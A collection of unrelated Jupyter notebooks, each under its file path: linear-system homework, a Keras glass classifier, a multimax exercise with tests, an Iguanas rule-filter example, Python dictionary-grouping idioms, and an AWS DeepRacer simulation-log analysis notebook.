[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0, 0, 0, 1]
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
###Markdown
We can also see the relevant carbon-oxygen bonds in the following block:
###Code
for i in range(346, 348):
print(output[1][i][183:198])
###Output
[2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
|
Tareas/Tarea #1.3_06 febrero.ipynb | ###Markdown
Industrial Robotics--Alejandro Rojas Barba. Due date: February 11, 2019. Assignment 3, Exercise 1--Mrs. Mercedes went to the market and was offered the following promotions: a package of 3 soaps, 2 tubes of toothpaste and 4 toothbrushes for 206; a second package of 5 soaps, 3 tubes of toothpaste and 2 toothbrushes for 210; and a third package containing 6 units of each of the previous items for 412. What is the cost of each item?
###Code
import numpy as np
A=np.array([ [3,2,4],
[5,3,2],
[6,6,6] ])
B=np.array([ [206],
[210],
[412] ])
C=np.linalg.inv(A)@B
print("Soaps:",float(C[0]))
print("Toothpaste:",float(C[1]))
print("Toothbrushes:",float(C[2]))
###Output
Soaps: 15.333333333333357
Toothpaste: 26.666666666666657
Toothbrushes: 26.66666666666667
###Markdown
Exercise 2--Mrs. Juana buys 3 kg of beans, 2 kg of salt and 1 kg of rice for 130. Mrs. Petra buys 2 kg of beans, 1 kg of salt and 1 kg of rice, paying a total of 90. Another lady buys 1 kg of beans, 1 kg of salt and 1 kg of rice, paying a total of 60. If the three ladies shopped at the same store, what is the price per kg of each product?
###Code
A=np.array([ [3,2,1],
[2,1,1],
[1,1,1] ])
B=np.array([ [130],
[90],
[60] ])
C=np.linalg.inv(A)@B
print("Beans:",int(C[0]))
print("Salt:",int(C[1]))
print("Rice:",int(C[2]))
###Output
Beans: 30
Salt: 10
Rice: 20
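###Markdown
Both systems can also be solved without forming the inverse explicitly; `np.linalg.solve` is the usual choice (a short sketch reusing the matrices from Exercise 2):
###Code
# np.linalg.solve factorizes A instead of computing its inverse, which is faster and more stable
C = np.linalg.solve(A, B)
print("Beans:", round(float(C[0])))
print("Salt:", round(float(C[1])))
print("Rice:", round(float(C[2])))
###Output
_____no_output_____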
|
Neural Networks/Glass.ipynb | ###Markdown
###Code
import tensorflow as tf
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
print(f'Tensorflow version: {tf.__version__}')
glass_data = pd.read_csv('/content/drive/My Drive/Colab Notebooks/glass.csv', parse_dates=True, encoding = "cp1252")
glass_data.head()
glass_data.groupby('Type').count().reset_index()
glass_data['Type'].replace(to_replace={1: 0, 2: 1, 3: 2, 4: 3, 5: 4, 6: 5, 7: 6}, inplace=True)
corr = glass_data.corr(method = "pearson")
# corr = glass_data.corr(method = "spearman")
# corr = glass_data.corr(method = "kendall")
f, ax = plt.subplots(figsize=(10, 10))
sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True), square=True, ax=ax, annot=True)
X = glass_data[['RI','Na','Mg','Al','Si','K','Ca','Ba','Fe']]
y = glass_data['Type']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
print(X_train.shape[1])
print(y.unique())
model = tf.keras.models.Sequential([
tf.keras.layers.Dense(units=155, input_shape=(X_train.shape[1],), activation='relu'),
tf.keras.layers.Dense(units=72, activation='relu'),
tf.keras.layers.Dense(units=152, activation='relu'),
tf.keras.layers.Dense(units=52, activation='relu'),
tf.keras.layers.Dense(units=152, activation='relu'),
tf.keras.layers.Dense(units=52, activation='relu'),
tf.keras.layers.Dense(units=7, activation='softmax')
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.summary()
cl = model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=50)
fig, ax = plt.subplots(figsize=(15,5))
plt.plot(cl.history['accuracy'], label='accuracy')
plt.plot(cl.history['val_accuracy'], label='val_accuracy', linestyle='--')
plt.plot(cl.history['loss'], label='loss')
plt.plot(cl.history['val_loss'], label='val_loss', linestyle='--')
plt.legend()
y_pred = model.predict(X_test)
y_test_list=list(y_test)
total=len(y_test_list)
correct=0
# for i in range(len(y_test_list)):
# print(f'{i+1} - {y_pred[4][i]:.3f} - {y_test_list[4]}')
# if np.argmax(y_pred[i])+1==y_test_list[i]:
# print(f'{i+1} - {np.argmax(y_pred[i])} - {y_test_list[i]}')
for i in range(total):
# print(f'{np.argmax(y_pred[i])} - {np.amax(y_pred[i])} - {y_test_list[i]}')
if(np.argmax(y_pred[i])==y_test_list[i]):
correct+=1
print(f'{correct}/{total}')
print(correct/total)
p_test = model.predict(X_test).argmax(axis=1)
cm = tf.math.confusion_matrix(y_test, p_test)
f, ax = plt.subplots(figsize=(7, 5))
sns.heatmap(cm, annot=True, cmap='Blues', square=True, linewidths=0.01, linecolor='grey')
plt.title('Confusion matrix')
plt.ylabel('True label')
plt.xlabel('Predicted label')
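# A per-class summary to complement the confusion matrix (sketch; reuses y_test and p_test from above)
from sklearn.metrics import classification_report
print(classification_report(y_test, p_test))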
###Output
_____no_output_____ |
.ipynb_checkpoints/view_pairs-checkpoint.ipynb | ###Markdown
Todos based on today's observations: 1. Detect when there is an implicit multiplication? 2. Avoid situations like 1,…,n−1. 3. Potentially get rid of fractions? 4. Split on hspace, vspace, \\\\ (EQDS31476149Q) 5. Get rid of text 6. Add a tf-idf post-pass 7. Add a comma/semicolon split operator 8. Detect series?
###Code
katex('\\vec{\\xi}')
katex('\\xi')
###Output
_____no_output_____ |
Python/Python Morsels/multimax/my_try/multimax.ipynb | ###Markdown
Bonus1: Make sure the function returns an empty list if the iterable is empty
###Code
multimax([])
###Output
_____no_output_____
###Markdown
Bonus2: Make sure the function works well with iterator such as files, generators etc
###Code
numbers = [1, 3, 8, 5, 4, 10, 6]
odds = (n for n in numbers if n % 2 == 1)
multimax(odds)
###Output
_____no_output_____
###Markdown
Bonus3: The multimax function accepts a keyword argument called "key" that is a function which will be used to determine the key by which to compare values as maximums. For example, the key function could be used to find the longest words in a list of words
###Code
words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"]
multimax(words, key=len)
words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"]
max(words, key=len)
words = ["cheese", "shop", "argument", "of", "silly", "walks", "ministry", "clinic"]
max(words, key=len)
###Output
_____no_output_____
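###Markdown
One possible implementation that satisfies all three bonuses (a sketch for reference only; any implementation that passes the tests below works):
###Code
def multimax(iterable, key=None):
    """Return a list of all maximum values found in the iterable."""
    if key is None:
        key = lambda item: item
    maximums = []
    max_key = None
    for item in iterable:
        k = key(item)
        if not maximums or k > max_key:
            maximums = [item]
            max_key = k
        elif k == max_key:
            maximums.append(item)
    return maximums
###Output
_____no_output_____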
###Markdown
Unit tests
###Code
import unittest
class MultiMaxTests(unittest.TestCase):
"""Tests for multimax."""
def test_single_max(self):
self.assertEqual(multimax([1, 2, 4, 3]), [4])
def test_two_max(self):
self.assertEqual(multimax([1, 4, 2, 4, 3]), [4, 4])
def test_all_max(self):
self.assertEqual(multimax([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1])
def test_lists(self):
inputs = [[0], [1], [], [0, 1], [1]]
expected = [[1], [1]]
self.assertEqual(multimax(inputs), expected)
def test_order_maintained(self):
inputs = [
(3, 2),
(2, 1),
(3, 2),
(2, 0),
(3, 2),
]
expected = [
inputs[0],
inputs[2],
inputs[4],
]
outputs = multimax(inputs)
self.assertEqual(outputs, expected)
self.assertIs(outputs[0], expected[0])
self.assertIs(outputs[1], expected[1])
self.assertIs(outputs[2], expected[2])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_empty(self):
self.assertEqual(multimax([]), [])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_iterator(self):
numbers = [1, 4, 2, 4, 3]
squares = (n**2 for n in numbers)
self.assertEqual(multimax(squares), [16, 16])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_key_function(self):
words = ["alligator", "animal", "apple", "artichoke", "avalanche"]
outputs = ["alligator", "artichoke", "avalanche"]
self.assertEqual(multimax(words, key=len), outputs)
if __name__ == "__main__":
unittest.main(argv=['first-arg-is-ignored'], exit=False)
###Output
........
----------------------------------------------------------------------
Ran 8 tests in 0.004s
OK
|
iguanas/rule_selection/examples/simple_filter_example.ipynb | ###Markdown
Simple Filter Example The SimpleFilter class is used to filter out low performing rules from a set. Requirements To run, you'll need the following:* A rule set (specifically the binary columns of the rules as applied to a dataset). ---- Import packages
###Code
from iguanas.rule_selection import SimpleFilter
from iguanas.metrics.classification import FScore
import pandas as pd
###Output
_____no_output_____
###Markdown
Read in data Let's read in some dummy rules (stored as binary columns) and the target column.
###Code
X_rules_train = pd.read_csv(
'dummy_data/X_rules_train.csv',
index_col='eid'
)
y_train = pd.read_csv(
'dummy_data/y_train.csv',
index_col='eid'
).squeeze()
X_rules_test = pd.read_csv(
'dummy_data/X_rules_test.csv',
index_col='eid'
)
y_test = pd.read_csv(
'dummy_data//y_test.csv',
index_col='eid'
).squeeze()
X_rules_train.columns.tolist()
###Output
_____no_output_____
###Markdown
---- Filter rules based on performance metrics Set up class parameters Now we can set our class parameters for the `SimpleFilter` class. You need to provide the metric you want to filter by, as well as the threshold value and type of operator. Here, we'll be filtering out rules with an F1 score < 0.46. To filter on F1 score, we'll use the `FScore` class from the `metrics` module.**Please see the class docstring for more information on each parameter.**
###Code
f1 = FScore(beta=1)
params = {
'threshold': 0.46,
'operator': '>=',
'metric': f1.fit
}
###Output
_____no_output_____
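###Markdown
To make these parameters concrete, the same filtering idea can be expressed with plain pandas and scikit-learn. This is an illustration only, not the internal implementation of `SimpleFilter`; `sklearn.metrics.f1_score` stands in for the `FScore` class here:
###Code
from sklearn.metrics import f1_score

# keep the rules (binary columns) whose F1 score against y_train meets the threshold
manual_rules_to_keep = [
    col for col in X_rules_train.columns
    if f1_score(y_train, X_rules_train[col]) >= 0.46
]
manual_rules_to_keep
###Output
_____no_output_____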
###Markdown
Instantiate class and run fit method Once the parameters have been set, we can run the `fit` method to calculate which rules should be kept.
###Code
fr = SimpleFilter(**params)
fr.fit(
X_rules=X_rules_train,
y=y_train
)
###Output
_____no_output_____
###Markdown
Outputs The `fit` method does not return anything. See the `Attributes` section in the class docstring for a description of each attribute generated:
###Code
fr.rules_to_keep
###Output
_____no_output_____
###Markdown
---- Drop filtered rules from another dataset Use the `transform` method to drop the filtered rules from a given dataset.
###Code
X_rules_test_filtered = fr.transform(X_rules=X_rules_test)
###Output
_____no_output_____
###Markdown
Outputs The `transform` method returns a dataframe with the filtered rules dropped:
###Code
X_rules_test_filtered.head()
###Output
_____no_output_____
###Markdown
---- Calculate filtered rules and drop them from a dataset (in one step) You can also use the `fit_transform` method to calculate the filtered rules and drop them from the training set.
###Code
X_rules_train_filtered = fr.fit_transform(
X_rules=X_rules_train,
y=y_train
)
###Output
_____no_output_____
###Markdown
Outputs The `fit_transform` method returns a dataframe with the filtered rules dropped:
###Code
fr.rules_to_keep
X_rules_train_filtered.head()
###Output
_____no_output_____ |
dialectal segmenter/Transforming Code into Beautiful, Idiomatic Python.ipynb | ###Markdown
Grouping with dictionaries
###Code
names = ['Mohamed', 'disooqi', 'Asmaa', 'Mariam', 'Fatema']
d={}
for name in names:
key = len(name)
if key not in d:
d[key] = []
d[key].append(name)
d
from collections import defaultdict
d = defaultdict(list)
for name in names:
key = len(name)
d[key].append(name)
d
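# For completeness, the intermediate idiom between the plain-dict and the
# defaultdict versions above is dict.setdefault (a small sketch):
d = {}
for name in names:
    key = len(name)
    d.setdefault(key, []).append(name)
d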
from collections import ChainMap  # ChainMap lives in collections, not __future__
b = {'x': 1, 'y': 2}   # example dicts, assumed here only for illustration
c = {'y': 20, 'z': 3}  # entries in c take priority over entries in b
d = ChainMap(c, b)
d
from collections import namedtuple
dos = namedtuple('disooqi', ['married','kids','job'])
dos(4,2,1)
###Output
_____no_output_____ |
log-analysis/DeepRacer Log Analysis.ipynb | ###Markdown
Simulation Run Log Analysis and Visualization for AWS DeepRacer. This notebook walks through how you can analyze and debug using the AWS DeepRacer simulation logs: ```1. Tools to find the best iteration of your model 2. Visualize reward distribution on the track 2.1 Visualize reward heatmap per episode or iteration 3. Identify hotspots on the track for your model 4. Understand probability distributions on simulated images 5. Evaluation run analysis - plot lap speed heatmap``` Requirements: boto3 >= 1.9.133; configure your AWS CLI and/or boto credentials file. AWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html Boto Configuration: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html
###Code
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import datetime
%matplotlib inline
#Shapely Library
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
from log_analysis import *
import cw_utils
# Make sure your boto version is >= '1.9.133'
cw_utils.boto3.__version__
#print log files and show most recent. You may want to use that file for analysis
import os
file_list = []
for file in os.listdir("logs"):
if(file=="latest"):
continue
file_list.append([os.stat(os.path.join("logs", file)).st_mtime, os.path.join("logs", file)])
file_list.sort(key=lambda x: x[0]) # sort by creation date
print(file + " : " + str(os.stat(os.path.join("logs", file)).st_mtime))
print("\nMost recent file = " + file_list[-1][1])
fname = file_list[-1][1]
###Output
deepracer-fe179db0-c1f3-11e9-8c5c-0242ac120004.log : 1566166485.1706324
c02f1706-c13c-11e9-8ad0-0242ac120004 : 1566080238.9316764
deepracer-5bf07a28-c1ff-11e9-ae47-0242ac120004.log : 1566166072.0296586
deepracer-Oval_track.log : 1566167056.440198
deepracer-Oval_Track.log : 1566178685.2514682
log : 1566862739.0616481
deepracer-sim-2zfqgg08b2bl.log : 1566260306.61707
deepracer-sim-sample.log : 1566167020.652166
deepracer-dr-sm-rltj--20190819134949-f350b748-9893-4350-8d32-3869ab5038e3.log : 1566261861.6997128
deepracer-6ebf6bca-c13f-11e9-bd3a-0242ac120004.log : 1566166471.5945964
deepracer-sim-j5gdq7sxh2c2.log : 1566261926.8624902
Most recent file = logs/log
###Markdown
Download the desired log file given the simulation ID. If you wish to bulk export the logs from Amazon CloudWatch to Amazon S3, see https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3ExportTasks.html (an example export command is sketched after the next cell).
###Code
#stream_name = 'sim-2zfqgg08b2bl' ## CHANGE This to your simulation application ID
stream_name = 'sim-j5gdq7sxh2c2' #training 5 min
fname = 'logs/deepracer-%s.log' %stream_name
cw_utils.download_log(fname, stream_prefix=stream_name)
!tail -n 3 $fname
###Output
SIM_TRACE_LOG:20,55,3.9585,0.6759,-0.0161,-0.26,0.50,2,1.0000,False,True,5.9333,4,17.67,1566223048.2305052
SIM_TRACE_LOG:20,56,3.9712,0.6751,-0.0155,-0.52,1.00,1,1.0000,False,True,6.0052,4,17.67,1566223048.2976956
SIM_TRACE_LOG:20,57,3.9911,0.6734,-0.0246,0.00,1.00,5,1.0000,False,True,6.1177,4,17.67,1566223048.3647573
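###Markdown
If you prefer the bulk-export route mentioned above, the export task can also be created from the AWS CLI. The command below is only a sketch: the log group, the time range (epoch milliseconds), and the bucket/prefix are placeholders you must replace, and the destination bucket needs a policy that allows CloudWatch Logs to write to it.
###Code
!aws logs create-export-task \
    --log-group-name "<your-deepracer-log-group>" \
    --from 1566000000000 --to 1566300000000 \
    --destination "<your-s3-bucket>" \
    --destination-prefix "deepracer-logs"
###Output
_____no_output_____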
###Markdown
Load waypoints for the track you want to run analysis on. ```Tracks available: AWS_track Straight_track Oval_track Bowtie_track H_track reinvent_base```
###Code
def get_track_waypoints(track_name):
return np.load("tracks/%s.npy" % track_name)
waypoints = get_track_waypoints("reinvent_base") ### re:invent track
waypoints.shape
###Output
_____no_output_____
###Markdown
Visualize the Track and Waypoints
###Code
l_center_line = LineString(waypoints[:,0:2])
l_inner_border = LineString(waypoints[:,2:4])
l_outer_border = LineString(waypoints[:,4:6])
road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border))))
road_poly
# rescale waypoints to centimeter scale
center_line = waypoints[:,0:2] *100
inner_border = waypoints[:,2:4] *100
outer_border = waypoints[:,4:6] *100
###Output
_____no_output_____
###Markdown
Helper Functions
###Code
def plot_track(df, track_size=(500, 800), x_offset=0, y_offset=0):
'''
Each track may have a diff track size,
For reinvent track, use track_size=(500, 800)
Tokyo, track_size=(700, 1000)
x_offset, y_offset is used to convert to the 0,0 coordinate system
'''
track = np.zeros(track_size) # lets magnify the track by *100
for index, row in df.iterrows():
x = int(row["x"]) + x_offset
y = int(row["y"]) + y_offset
reward = row["reward"]
track[y,x] = reward
fig = plt.figure(1, figsize=(12, 16))
ax = fig.add_subplot(111)
print_border(ax, center_line, inner_border, outer_border)
return track
def plot_top_laps(sorted_idx, n_laps=5):
fig = plt.figure(n_laps, figsize=(12, 30))
for i in range(n_laps):
idx = sorted_idx[i]
episode_data = episode_map[idx]
ax = fig.add_subplot(n_laps,1,i+1)
line = LineString(center_line)
plot_coords(ax, line)
plot_line(ax, line)
line = LineString(inner_border)
plot_coords(ax, line)
plot_line(ax, line)
line = LineString(outer_border)
plot_coords(ax, line)
plot_line(ax, line)
for idx in range(1, len(episode_data)-1):
x1,y1,action,reward,angle,speed = episode_data[idx]
car_x2, car_y2 = x1 - 0.02, y1
plt.plot([x1*100, car_x2*100], [y1*100, car_y2*100], 'b.')
return fig
###Output
_____no_output_____
###Markdown
Load the training log
###Code
data = load_data(fname)
df = convert_to_pandas(data)
df.head()
df['y'].min(), df['y'].max()
# Normalize the rewards to a 0-1 scale
from sklearn.preprocessing import MinMaxScaler
min_max_scaler = MinMaxScaler()
scaled_vals = min_max_scaler.fit_transform(df['reward'].values.reshape(df['reward'].values.shape[0], 1))
df['reward'] = pd.DataFrame(scaled_vals.squeeze())
df['reward'].min(), df['reward'].max()
###Output
_____no_output_____
###Markdown
Plot rewards per Iteration. This graph is useful to understand the mean reward and its standard deviation across the episodes within each iteration.
###Code
REWARD_THRESHOLD = 100
# reward graph per episode
min_episodes = np.min(df['episode'])
max_episodes = np.max(df['episode'])
print('Number of episodes = ', max_episodes)
total_reward_per_episode = list()
for epi in range(min_episodes, max_episodes):
df_slice = df[df['episode'] == epi]
total_reward_per_episode.append(np.sum(df_slice['reward']))
average_reward_per_iteration = list()
deviation_reward_per_iteration = list()
buffer_rew = list()
for val in total_reward_per_episode:
buffer_rew.append(val)
if len(buffer_rew) == 20:
average_reward_per_iteration.append(np.mean(buffer_rew))
deviation_reward_per_iteration.append(np.std(buffer_rew))
# reset
buffer_rew = list()
fig = plt.figure(figsize=(6, 12))
ax = fig.add_subplot(311)
ax.plot(np.arange(len(average_reward_per_iteration)), average_reward_per_iteration, '.')
ax.set_title('Rewards per Iteration')
ax.set_ylabel('Mean reward')
ax.set_xlabel('Iteration')
for rr in range(len(average_reward_per_iteration)):
if average_reward_per_iteration[rr] >= REWARD_THRESHOLD :
ax.plot(rr, average_reward_per_iteration[rr], 'r.')
plt.grid(True)
ax = fig.add_subplot(312)
ax.plot(np.arange(len(deviation_reward_per_iteration)), deviation_reward_per_iteration, '.')
ax.set_ylabel('Dev of reward')
ax.set_xlabel('Iteration')
plt.grid(True)
for rr in range(len(average_reward_per_iteration)):
if average_reward_per_iteration[rr] >= REWARD_THRESHOLD:
ax.plot(rr, deviation_reward_per_iteration[rr], 'r.')
ax = fig.add_subplot(313)
ax.plot(np.arange(len(total_reward_per_episode)), total_reward_per_episode, '.')
ax.set_ylabel('Total reward')
ax.set_xlabel('Episode')
###Output
Number of episodes = 20
###Markdown
Analyze the reward distribution for your reward function
###Code
# add y_offset to bring everything to the positive axis
y_offset = int(df['y'].min())
if y_offset > 0: # if positive, just keep it the same
y_offset = 0
y_offset = abs(y_offset)
inner_border[:,1] = inner_border[:,1] + y_offset
center_line[:,1] = center_line[:,1] + y_offset
outer_border[:,1] = outer_border[:,1] + y_offset
#NOTE: For the Tokyo track use these dimensions
#track = plot_track(df, track_size=(700, 1000), x_offset=0, y_offset=y_offset)
#plt.title("Reward distribution for all actions ")
#im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
track = plot_track(df)
plt.title("Reward distribution for all actions ")
im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
###Output
_____no_output_____
###Markdown
Plot a particular iteration
###Code
iteration_id = 36
track = plot_track(df[df['iteration'] == iteration_id])
plt.title("Reward distribution for all actions ")
im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower")
###Output
_____no_output_____
###Markdown
Path taken for top reward iterations. NOTE: in a single episode, the car can go around multiple laps; the episode is terminated when the car completes 1000 steps.
###Code
action_map, episode_map, sorted_idx = episode_parser(data)
fig = plot_top_laps(sorted_idx[:], 3)
###Output
_____no_output_____
###Markdown
Path taken in a particular episode
###Code
## Evaluation RUN
def plot_episode_run(df, E):
fig = plt.figure(1, figsize=(12, 16))
ax = fig.add_subplot(211)
print_border(ax, center_line, inner_border, outer_border)
episode_data = df[df['episode'] == E]
for row in episode_data.iterrows():
x1,y1,action,reward = row[1]['x'], row[1]['y'], row[1]['action'], row[1]['reward']
car_x2, car_y2 = x1 - 0.02, y1
plt.plot([x1, car_x2], [y1, car_y2], 'r.')
plot_episode_run(df, E=500) # arbitrary episode
###Output
_____no_output_____
###Markdown
Path taken in a particular Iteration
###Code
iteration_id = 20
EPISODE_PER_ITER = 30 #number of episodes per iteration as defined in your hyperparameters
for i in range((iteration_id-1)*EPISODE_PER_ITER, (iteration_id)*EPISODE_PER_ITER):
plot_episode_run(df, E=i)
###Output
/home/ccsantos/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:4: MatplotlibDeprecationWarning: Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance.
after removing the cwd from sys.path.
###Markdown
Action breakdown per iteration and histogram of the action distribution for each of the turns - reinvent track. This plot is useful to understand the actions that the model takes in any given iteration. ** NOTE: This is only supported for the reinvent track currently. **
###Code
fig = plt.figure(figsize=(16, 24))
iterations_downselect = [iteration_id] ## Let's pick the iterations with the highest rewards
# Track Segment Labels
action_names = ['LEFT', 'RIGHT', 'STRAIGHT', 'SLIGHT LEFT', 'SLIGHT RIGHT', 'SLOW']
vert_lines = [10,25,32,33,40,45,50,53,61,67]
track_segments = [(15, 100, 'hairpin'),
(32, 100, 'right'),
(42, 100, 'left'),
(51, 100, 'left'),
(63, 100, 'left')]
segment_x = np.array([15, 32, 42, 51, 63])
segment_y = np.array([0, 0, 0, 0, 0])
segment_xerr = np.array([[5, 1, 2, 1, 2], [10, 1, 3, 2, 4]])
segment_yerr = np.array([[0, 0, 0, 0, 0], [150, 150, 150, 150, 150]])
wpts_array = center_line
for iter_num in iterations_downselect:
# Slice the data frame to get all episodes in that iteration
df_iter = df[(iter_num == df['iteration'])]
n_steps_in_iter = len(df_iter)
print('Number of steps in iteration=', n_steps_in_iter)
th = 0.8
for idx in range(len(action_names)):
ax = fig.add_subplot(6, 2, 2*idx+1)
print_border(ax, center_line, inner_border, outer_border)
df_slice = df_iter[df_iter['reward'] >= th]
df_slice = df_slice[df_slice['action'] == idx]
ax.plot(df_slice['x'], df_slice['y'], 'b.')
for idWp in vert_lines:
ax.text(wpts_array[idWp][0], wpts_array[idWp][1]+20, str(idWp), bbox=dict(facecolor='red', alpha=0.5))
#ax.set_title(str(log_name_id) + '-' + str(iter_num) + ' w rew >= '+str(th))
ax.set_ylabel(action_names[idx])
# calculate action way point distribution
action_waypoint_distribution = list()
for idWp in range(len(wpts_array)):
action_waypoint_distribution.append(len(df_slice[df_slice['closest_waypoint'] == idWp]))
ax = fig.add_subplot(6, 2, 2 * idx + 2)
# Call function to create error boxes
_ = make_error_boxes(ax, segment_x, segment_y, segment_xerr, segment_yerr)
for tt in range(len(track_segments)):
ax.text(track_segments[tt][0], track_segments[tt][1], track_segments[tt][2])
ax.bar(np.arange(len(wpts_array)), action_waypoint_distribution)
ax.set_xlabel('waypoint')
ax.set_ylabel('# of actions')
ax.legend([action_names[idx]])
ax.set_ylim((0, 150))
###Output
Number of steps in iteration= 0
###Markdown
Let's analyze the hairpin turn for the best iteration. We see that the model likes to take Slight Left and Straight over the other actions, while the frequency of the Slight Right and Right actions is very low in comparison. In short, this model seems to do well on the hairpin turn. Simulation Image Analysis - Probability distribution on decisions (actions). Is the model making decisions that are "too close", or is it confident for the laps it finishes? If the top and second-best decisions are far apart, the model is most likely making more confident decisions.
###Code
import glob
img_path = "simulation_episode/"
all_files = sorted(glob.glob(img_path + '/*.png'))
!grep "S3 bucket" $fname
!grep "S3 prefix" $fname
###Output
S3 bucket: aws-deepracer-0366eb7d-d338-48e6-b5b3-3a1fc7e3681e
S3 prefix: DeepRacer-SageMaker-RoboMaker-comm-251199395322-20190819134948-3a1a4c3e-b32a-44f3-b333-221a2fb216d3
###Markdown
Download all the checkpoints (provided as an example). We recommend downloading only the ones you are interested in
###Code
##!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_*"
## For this example lets download all models in interation in the 30s
## NOTE: Copy the variables from the output of the grep command
s3_bucket = ''
s3_prefix = ''
!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_3*"
import tensorflow as tf
import numpy as np
from tensorflow.python.platform import gfile
from PIL import Image
GRAPH_PB_PATH = 'intermediate_checkpoint/'
def load_session(pb_path):
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True))
print("load graph:", pb_path)
with gfile.FastGFile(pb_path,'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
sess.graph.as_default()
tf.import_graph_def(graph_def, name='')
graph_nodes=[n for n in graph_def.node]
names = []
for t in graph_nodes:
names.append(t.name)
x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0')
y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
return sess, x, y
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
!ls $GRAPH_PB_PATH
model_inference = []
iterations = [30, 36]
for ii in iterations:
model, obs, model_out = load_session(GRAPH_PB_PATH + 'model_%s.pb' % ii)
arr = []
for f in all_files[:]:
img = Image.open(f)
img_arr = np.array(img)
img_arr = rgb2gray(img_arr)
img_arr = np.expand_dims(img_arr, axis=2)
current_state = {"observation": img_arr} #(1, 120, 160, 1)
y_output = model.run(model_out, feed_dict={obs:[img_arr]})[0]
arr.append (y_output)
model_inference.append(arr)
model.close()
tf.reset_default_graph()
prob_diff = []
for mi in model_inference[0]:
max1, max2 = mi.argsort()[-2:][::-1]
prob_diff.append(mi[max1] - mi[max2])
plt.hist(prob_diff)
prob_diff = []
for mi in model_inference[1]:
max1, max2 = mi.argsort()[-2:][::-1]
prob_diff.append(mi[max1] - mi[max2])
plt.hist(prob_diff)
###Output
_____no_output_____
###Markdown
model 36 appears to have a better seperation in probabability, hence may work better in sim2real experiments Model CSV AnalysisDownload the model from the console AWS DeepRacer > Reinforcement learning > $Training Job Name$ > Download Model
###Code
fname = 'intermediate_checkpoint/worker_0.simple_rl_graph.main_level.main_level.agent_0.csv'
df_csv = pd.read_csv(fname)
df_csv.columns
title = "Training"
df_csv.plot(x='Training Iter', y='Training Reward', style='.',
title=title)
df_csv['Episode Length'].plot()
###Output
_____no_output_____
###Markdown
Evaluation Run Analysis. Debug your evaluation runs or analyze the laps.
###Code
eval_sim = 'sim-h712thgp6gz2'
eval_fname = 'deepracer-eval-%s.log' % eval_sim
cw_utils.download_log(eval_fname, stream_prefix=eval_sim)
!head $eval_fname
eval_fname = 'logs/deepracer-eval-sim-sample.log'
eval_data = load_data(eval_fname)
eval_df = convert_to_pandas(eval_data, None)
eval_df.head()
###Output
_____no_output_____
###Markdown
Grid World Analysis. Understand the speed of the car along with the path on a per-episode basis. This can help you debug portions of the track where the car may not be going fast, giving you hints on how to improve your reward function.
###Code
N_EPISODES = 3
for e in range(N_EPISODES):
print ("Episode #%s " %e)
episode_df = eval_df[eval_df['episode'] == e]
plot_grid_world(episode_df, inner_border, outer_border, scale=5.0)
print ("###############################################################\n\n")
###Output
_____no_output_____
###Markdown
What is the model looking at? Grad-CAM: a visual heatmap of where the model is looking when making its decisions, based on https://arxiv.org/pdf/1610.02391.pdf
###Code
import cv2
import numpy as np
import tensorflow as tf
def visualize_gradcam_discrete_ppo(sess, rgb_img, category_index=0, num_of_actions=6):
'''
@inp: model session, RGB Image - np array, action_index, total number of actions
@return: overlayed heatmap
'''
    img_arr = np.array(rgb_img)
img_arr = rgb2gray(img_arr)
img_arr = np.expand_dims(img_arr, axis=2)
x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0')
y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0')
feed_dict = {x:[img_arr]}
#Get he policy head for clipped ppo in coach
